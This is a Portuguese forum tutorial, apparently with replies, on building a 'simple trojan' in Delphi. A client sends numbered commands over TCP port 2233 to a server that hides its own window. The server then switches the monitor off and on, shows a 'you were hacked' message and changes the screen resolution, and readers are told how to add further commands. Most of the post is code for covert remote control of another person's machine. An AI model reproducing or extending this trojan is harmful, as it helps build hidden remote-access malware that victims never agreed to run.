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Criando um simples trojan em Delphi


Foxxystyle
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Neste tutorial montaremos um trojan com duas funções, se quiser coloque mais depois.

 

 

1° abra o delphi e instale o ClientSocket e o ServerSocket.

 

Instalando

Vá em Component > Install Pakages > Add

 

Na onde esta o campo pra por o nome coloque isso e clique em abrir...

 

C:\Arquivos de programas\Borland\Delphi7\Bin\dclsockets70.bpl

 

Depois ok e pronto!

 

Vá na paleta Internet e pegue o TClientSocket1

 

Depois de colocar, vá na paleta Standard e coloque 2 Buttons, 1 Edit e 2 Labels organize ele no Form1.

 

é de sua preferência.

 

Depois de dois cliques no botão Conectar e Digite:

 

 

Código:

 

ClientSocket1.Address:= Edit1.Text;

ClientSocket1.Active := True;

 

Na primeira linha ativa o ClientSocket, na segunda ele pega o IP que se encontra no Edit1, na terceira ele se conecta... Mas e agora, como vamos saber o progresso de conexão?

Simples coloque mais um Label, lá em baixo... e no Caption dele coloque “Desconectado”.

Depois de ter colocado Vá no Events do ClientSocket1 e procure por

OnConnect

 

De dois cliques na área livre e abrirá a Unit, acredito que o nome do Label de status seja Label4.

Clique no espaço vazio e digite:

 

 

Código:

Label4.Caption := ‘Conectado!’;

 

 

Na hora que tiver conectado no label4 aparecerá:

 

Conectado!

 

Depois clique no evento OnConnecting

 

E digite:

 

 

Código:

Label4.Caption := ‘Conectando . . .’;

 

Na hora que ele estiver conectando aparecerá isto:

 

Conectando . . .

 

Agora vá no evento OnDisconnect e digite:

 

Código:

Label4.Caption := ‘Desconectado.’;

 

Na hora que você desconectar aparecerá

 

Desconectado.

 

Agora vá no evento OnError e digite:

 

 

Código:

Label4.Caption := ‘Erro ao conectar com ‘+ Edit1.Text +’ ’;

 

Quando ele não conseguir se conectar irá aparecer isto:

 

Erro ao conectar com 127.0.0.1 (127.0.0.1 = no lugar vai aparecer o IP digitado no Edit1)

 

Agora vem uma dúvida, como eu faço pra quando a pessoa clicar em conectar o Label conectar fique Desativado e o de desconectar Ativado?

 

Simples, agora vamos fazer isto

 

Clique no Evento OnConnect do ClientSocket1

 

E digite

 

 

Código:

 

Label2.Enabled := False;

Label3.Enabled := True;

 

o Label2 é o que esta escrito Conectar e o Label3 é o que esta escrito Desconectar.

 

Agora vá no Evento OnDisconnect e digite:

 

 

Código:

 

Label2.Enabled := True;

Label3.Enabled := False;

 

Depois no Evento OnError digite:

 

 

Código:

Label2.Enabled := True;

 

Depois vá no Properties do ClientSocket1

E digite uma porta... vou por 2233 coloque a sua mas, essa é mais fácil.

 

No botão Desconectar lá em cima de dois cliques e digite:

 

 

Código:

ClientSocket1.Close;

 

Agora de dois Cliques no botão Desligar Monitor e digite:

 

 

Código:

ClientSocket1.Socket.SendText(‘1 ‘);

 

No botão Ligar Montiro digite:

 

 

Código:

ClientSocket1.Socket.SendText(‘2 ‘);

 

Depois de feito tudo isso salve e compile ele.

 

Agora inicie uma nova aplicação no delphi.

Vá na paleta Internet e pegue o TServerSocket1 e coloque no Form.

Depois clique no ServerSocket1 e vá no evento OnClientRead

Apague a palavra begin ficando somente isso:

 

 

Código:

 

procedure TForm1.ServerSocket1ClientRead(Sender: TObject;

Socket: TCustomWinSocket);

 

Em baixo disso digite:

 

 

Código:

 

var

Entrada : String;

begin

Entrada := Socket.ReceiveText;

 

Ficando assim:

 

procedure TForm1.ServerSocket1ClientRead(Sender: TObject;

Socket: TCustomWinSocket);

var

Entrada : String;

begin

Entrada := Socket.ReceiveText;

 

O código acima faz o tratamento dos comandos recebidos.

 

Agora aperte duas veses a tecla enter e digite:

 

 

Código:

 

//Desligar Monitor

if Entrada = '1' then

begin

//Comando...

SendMessage (Application.Handle, WM_SYSCOMMAND, SC_MONITORPOWER, 1);

end;

//Liga Monitor

if Entrada = '2' then

begin

//Comando...

SendMessage (Application.Handle, WM_SYSCOMMAND, SC_MONITORPOWER, -1);

end;

 

Explicando quando o cliente envia o número 1, o servidor trata e executa o comando que seria desligar o monitor.

 

Quando o cliente envia o número 2 ele liga o monitor.

 

Agora se você quiser colocar mais funções você deve acrescentar no servidor isso:

 

 

Código:

if Entrada = ‘3’ then

begin

ShowMessage(‘Você foi invadido!!’);

end;

 

 

O número 3 deve ser trocado se quiser tipo você tem 5 funções vai por a 6 você altera o 3 por 6 assim sucessivamente em baixo de begin você coloca o comando ali no caso vai aparecer uma mensagem dizendo Você foi hackeado!!, daí no Cliente você tem que por um botão e no evento OnClick, colocar isso:

 

 

Código:

ClientSocket1.Socket.SendText(‘3 ‘);

 

Sempre depois do número você deve por espaço... Acho que até ai vocês entenderam... agora vá no Properties do ServerSocket1

e na Port coloque:

 

2233

 

No evento OnCreate do Form1 coloque isso:

 

 

Código:

 

Application.ShowMainForm:= False;

ServerSocket1.Active := True;

 

Isso faz com que o Form1 não seja apresentado, faz com que fique invisível... Salve o Servidor... e Compile...

 

 

Function DynamicResolution(X, Y: word): Boolean;

//

// Troca a resolução de vídeo

//

var

lpDevMode: TDeviceMode;

begin

if EnumDisplaySettings(nil, 0, lpDevMode) then

begin

lpDevMode.dmFields := DM_PELSWIDTH Or DM_PELSHEIGHT;

lpDevMode.dmPelsWidth := X;

lpDevMode.dmPelsHeight:= Y;

Result := ChangeDisplaySettings(lpDevMode, 0) = DISP_CHANGE_SUCCESSFUL;

end;

end;

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mano para simplificar para o servidor ficar oculto e so por no evento OnPaint do Form o seguinte codigo:

 

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ah manin e os creditos????:ironico:

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